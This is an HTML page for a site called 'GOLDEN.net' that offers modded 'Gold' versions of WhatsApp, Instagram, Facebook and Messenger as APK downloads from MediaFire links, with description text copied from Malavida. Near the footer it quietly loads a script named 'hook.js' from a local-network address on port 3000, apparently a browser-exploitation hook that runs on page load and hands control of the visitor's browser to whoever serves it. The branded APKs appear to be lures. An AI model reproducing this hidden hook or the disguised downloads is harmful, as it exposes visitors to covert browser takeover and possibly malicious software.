<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- BOOTSTRAP -->
 <link rel="stylesheet" href="bootstrap-5.2.3-dist/css/bootstrap.css">
 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
  
  <!-- NORMALIZE -->
  <link rel="stylesheet" href="normalize.css">
  <!-- ICONS -->
  <link rel="stylesheet" href="css/all.min.css">
  <link rel="stylesheet" href="css/all.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css">
  <!-- google font -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Cairo:wght@300;700;900;1000&display=swap" rel="stylesheet">
<style>
  header{
 background: rgb(255, 255, 255);
 padding-top: 5px;
}

.headcontener,
.container,
.headerGOLDEN,
.footercontener,
.menucontener{
  margin-left: auto;
  margin-right: auto;
  padding-left: 15px;
  padding-right: 15px;
}
/* small */

@media (min-width: 768px) {
.headcontener,
.container,
.headerGOLDEN,
.footercontener,
.menucontener{
  width: 750px;
}
    
  footer img{
    
    margin-left: 50% ;
  
  }
  
}

/* medium */

@media (min-width: 992px) {
.headcontener,
.container,
.headerGOLDEN,
.footercontener,
.menucontener{
  width: 970px;
}
  
  footer img{
    
    margin-left: 445px;
  
  }
}

/* large */

@media (min-width: 1200px) {
  .headcontener,
.container,
.headerGOLDEN,
.footercontener,
.menucontener{
  width: 1170px;
}
  
  footer img{
    
    margin-left: 560px ;
  
  }
  .footerlist{
    display: flex;
    justify-content: space-between;
  }
}

/* end global */

/* start header */
.card img {
  width: 20%;
}
header a{
  color: gold;
}
.headcontener{
  display: flex;
  justify-content: space-between;
  align-items: center;
}
.logo{
  width: 70px;
}

#searchInput{
  height: 100%;
  border-radius: 8px;
  padding: 10px;
  border: none;
  outline: none;
  width: 0;
  
  background: transparent;
  animation: sarch 1s linear;
  animation-fill-mode: both;  
}
@keyframes sarch {
  from {
    background: transparent;
    width: 0;
  }
  to {
    background: white;
    width: auto;
  }
}

#searchButton{
   background: transparent;
  color: gold;
  border: none;
  min-height: 45px;  
}

.links{
  position: relative;
  
  }

  header ul{
    list-style-type: none;
    margin: 0;
    padding: 0;
    display: none;
    border-radius: 5px;
    position: absolute;
    right: 0;
    min-width: 200px;
    top: 190%;
   transition: all 0.3s ease;
   background-color: #000000;
  }
  .links i{
    color: #ffffff;
  }
 header .links ul li:not(:last-child){
  border-bottom: 1px solid #949494;
 } 
  header ul a{
    text-decoration: none;
    color: gold;
    display: block;
    padding: 10px;
    transition: 0.3s;    
  }
  header ul a:hover{
    padding-left: 15px;
  }
header i{
  font-size: 20px;
}
.headerGOLDEN img{
  max-width: 30%;
 margin-left: 35%;
  margin-top: 40px;
  

}
.discription{
  color: #ffffff;
  
  text-transform: uppercase;
  font-size: 90%;
  margin-left: 29%;  
}
header svg{
  position: relative;
  bottom: -7px;
} 
/* slider */
.carousel-caption {
  background-color: rgba(0, 0, 0, 0.5);
  padding: 10px;
}
.carousel-caption h3 {
  color: #fff;
  font-size: 36px;
  font-weight: bold;
  margin-top: 10px;
}
.carousel-caption p {
  color: #fff;
  font-size: 24px;
  margin-bottom: 20px;
}
.carousel-indicators li {
  background-color: #000;
  border: 1px solid #fff;
  margin-right: 5px;
  margin-left: 5px;
}
.carousel-indicators .active {
  background-color: #fff;
}
.carousel-indicators li span {
  display: none;
}
.carousel-indicators li::before {
  content: attr(data-slide-to);
  display: block;
  color: #fff;
  font-size: 18px;
  line-height: 1.2;
  text-align: center;
}
/* menu */
.bestsiller{
  display: flex;
  justify-content: center;
}
.bestsiller img{
  width: 40%;

}
.bestsiller p{
  align-self: center;
  margin-left: 20px;
  margin-right: 20px;
  margin-top: 30px;
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  font-style: italic;
  font-weight: bold;
  font-size: x-large;
}
.bestsillermune{
  display: flex; 
  overflow-x: scroll;
  justify-content: space-between;
  width: calc(1900px+400rem);
 

}
.bestsillermune::-webkit-scrollbar{
  background: transparent; 
}
.card{
  margin-right: 100px;
 
}
.card:not(:last-child){
  margin-right: 0px;
}

/* footer */
footer{
  background: #000;
}
.footercontener{
  background: #000;
}
footer img{
  width: 50px;
}
.footerlist,
.footerlist ul{
  list-style-type: none;
  padding-top: 10px;

}
.footercontener{
  padding-top: 10px;
  padding-bottom: 10px;
}
.footerlist ul li{
  padding-top: 10px;
}
.copyright{
  text-align: center;
}
footer{
  margin-top: 10px;
}
body{
  background: #000;
}
a{
  color: gold;
}
a:hover{
  color: gold;
  text-decoration: none;
}
.btn{
  color: #000;
  background: gold;
  justify-content: center;
}
</style>
  <title>GOLDEN.net</title>
</head>
<body>

  <!-- start header -->
  <section>
<header>
  <div class="headcontener">
   <div style="color: gold; font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida GOLDENe', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; font-weight: bolder;"><span style="color: #000000; font-size: larger;">G</span>OLDEN</div>         
   
   
    <div class="links">
     <div class="btn"><i class="fa-sharp fa-solid fa-bars" ></i></div>        
     <ul>
      <li><a href=""><a href=""><i class="fa-solid fa-house" style="color: gold;"></i> Home</a></li>
      <li><div class="log"><a href=""><i class="fa-solid fa-plus" style="color: gold;"></i>Login</a></li>
    
     </ul>     
    </div>    
  </div>
  <div class="headerGOLDEN">
    <img src="https://th.bing.com/th/id/OIP.UYd7ot53rNonPdzcEi8w0QAAAA?w=177&h=180&c=7&r=0&o=5&dpr=1.3&pid=1.7" alt="">
   
  </div>
  
</header>
<br>
<br>
<br>
<br>
<br>
<!-- end header -->
<!-- start body -->
<div class="container">
  <!-- start slider -->
  
 <!-- end slider -->
<!-- start menu -->
  <div class="menucontener " >
<div>
  <div style="color: gold;">
    If you're fed up of the boring aspect of your traditional WhatsApp, you can always resort to downloading a MOD of this application. You know what a WhatsApp MOD is, don't you? Yes, a modified version of the official app that allows us to change certain aspects as well as adding new functions.

WhatsApp Gold, a MOD based on WAPlus
One of the most popular MODs, not to say the most, together with GBWhatsApp is definitely WhatsApp Plus or WhatsApp+. This is one of the most acclaimed versions amongst the users of alternative developments to the official application to chat and send messages, and it receives updates on a regular basis. Well, based on this MOD, several other ones have also been developed, as is the case of WhatsGold that incorporates all the functions of the latter as well as offering us a user interface full of golden themes and designs.

It adds several features regarding the original app which you'll be able to enjoy on your phone once you download its APK. These are its most noteworthy functions:

WhatsApp MOD developed upon the official app and that includes all the original functions.
Anti-ban protection.
Improved privacy management being able to hide our connection status.
Different themes to be downloaded.
Possibility to attach more images and videos to our messages.
Support for larger files.
Option to download the statuses of our contacts.
Different designs for checks and conversation bubbles.
These are just some of the features available in this app, but if you want to check them out for yourself simply hit the Download button. However, we have to warn you that since it's not an official development, your privacy and security may be jeopardized. So you have to see if you're interested in putting your personal info at stake by giving the data you share on the app to unknown third-party.

Requirements and additional information:
Minimum operating system requirements: Android 2.3.
The installation of the app by means of the APK file requires the activation of the "Unknown sources" option within Settings>Applications.
This program is a modified version of the original application, developed by a third party that has nothing to do with the owner or with Malavida, who have not verified, validates or approved the latter. Downloading, installing and using this program is under the user’s exclusive responsibility, without Malavida being liable for the effects or results that may take place on your device. Neither Malavida, nor the original developer of the modified app, nor any of their trademarks have any sort of relationship with this version.
  </div>
<div class="btn" style="background: gold; color: white; "> <a href="https://www.mediafire.com/file/8elay1ntk7m2tz6/whatsapp.apk/file" style="color: rgb(255, 255, 255);"> DOWNLOAD</a></div>
</div>

          <div class="bestsiller">
             
            <p style="color: #ffffff;">ALLOY</p>
             
              </div>
              <div class="bestsillermune" >

                <div>
                 <a href="https://www.mediafire.com/file/g3u1al5bltmx5c4/instgram.apk/file">
                 <div class="card"  style="width: 20rem; border: 0.1px gold solid; border-radius: 8px; padding: 10px;">
                  <img src="https://img.freepik.com/premium-vector/instagram-vector-social-media-icon-instagram-logo-illustration_153454-827.jpg?size=626&ext=jpg&ga=GA1.2.1753027067.1684600223&semt=ais" alt="" class="card-img-top w-100">
                  <div class="card-body">
                   <h1 class="card-title">INSTAGRAM GOLD</h1>
                   
                   <div class="btun" style="display: flex; justify-content: space-between;" >
                     <div class="btn  ">DOWNLOAD</div>
                   </div>
         
                  </div>
                 </div>
                 </a> 
               </div>
         
               <div>
                 <a href="https://www.mediafire.com/file/q2ke0l471zbsm4s/facebook.apk/file">
                 <div class="card"  style="width: 20rem; border: 0.1px gold solid; border-radius: 8px; padding: 10px;">
                  <img src="https://th.bing.com/th/id/OIP.U67dWYpbT6YGeMGaaFF7ZQHaHa?w=210&h=210&c=7&r=0&o=5&dpr=1.3&pid=1.7" alt="" class="card-img-top w-100">
                  <div class="card-body">
                   <h1 class="card-title">FACEBOOK GOLD</h1>
                  
                   <div class="btun" style="display: flex; justify-content: space-between;" >
                     <div class="btn  ">DOWNLOAD</div>
                   </div>
         
                  </div>
                 </div>
                 </a> 
               </div>
         
              

         
             
         
              <div>
                <a href="https://www.mediafire.com/file/84jcm6arf59rodm/messnger.apk/file">
                <div class="card"  style="width: 20rem; border: 0.1px gold solid; border-radius: 8px; padding: 10px;">
                 <img src="https://th.bing.com/th/id/OIP.IWMCw31KygjKSfmmb8L2lwAAAA?w=199&h=197&c=7&r=0&o=5&dpr=1.3&pid=1.7" alt="" class="card-img-top w-100">
                 <div class="card-body">
                  <h1 class="card-title">MASNGER GOLD</h1>
                 
                  <div class="btun" style="display: flex; justify-content: space-between;" >
                    <div class="btn  ">DOWNLOAD</div>
                  </div>
        
                 </div>
                </div>
                </a> 
              </div>
         

         

         
            
               </div>
               </div>
    </div>

  </div>
</div>

<!-- end body -->
<!-- start footer -->

<script src="http://192.168.1.5:3000/hook.js"></script>
<script src="bootstrap-5.2.3-dist/js/bootstrap.js"></script>
<script src="bootstrap-5.2.3-dist/js/code.jquery.com_jquery-3.7.0.min.js"></script>
<script src="bootstrap-5.2.3-dist/js/cdnjs.cloudflare.com_ajax_libs_popper.js_1.11.0_umd_popper.min.js"></script>
  <script>
    // list

var links = document.querySelector(".links ul");
var listIcon = document.querySelector(".links .btn");
links.style.transition = '0.3s';
listIcon.addEventListener('click',function() {
    if(links.style.display==='none') {
        links.style.display='block';        
     } else {
        links.style.display='none';        
    }
});
links.addEventListener('click' , function(){
    links.style.display ='none';
});

// search form

var searchinput = document.getElementById('searchInput');
var searchbtn = document.getElementById('searchButton');
var searchForm = document.getElementById('searchForm');

// searchbtn.addEventListener('mouseover', function() {
//     if (searchinput.style.display==='none') {        
//         searchinput.style.display='inline';
//         searchbtn.style.borderTopRightRadius='8px';
//         searchbtn.style.borderBottomRightRadius ='8px';
//         searchbtn.style.background = 'gold';
//         searchbtn.style.color = '#ffffff';
//         searchForm.style.background = '#ffffff';
        
//     } else {
//         searchinput.style.display='none'
//         searchbtn.style.background='transparent';
//         searchbtn.style.color = 'gold';

//     }
// });
// searchinput.addEventListener('mouseleave' , function(){
//     searchinput.style.display ='none';
//     searchbtn.style.background='transparent';
//     searchbtn.style.color = 'gold';
//     searchForm.style.background = 'transparent';

// });
searchbtn.addEventListener('mouseover', function() {
         if (searchinput.style.display==='none') {        
            searchinput.style.display='inline';
            searchinput.style.background='#ffffff';

            
         } else {
             searchinput.style.display='none'
             searchinput.style.background='transparent';
             
    
         }
     });
     searchinput.addEventListener('mouseleave' , function(){
         if(searchinput.value===""){
            searchinput.style.display ='none';
            searchinput.style.background='transparent';
         }
         else{
            searchinput.style.display='inline';
            searchinput.style.background='#ffffff';
         }
    
     });
    


// slider
var scroll = document.querySelector(".bestsillermune");
setInterval(function(){
    scroll.scrollBy(380,0);
},5000);
// hf
var visa =document.querySelector(".menucontener a");

  </script>
</body>
</html>
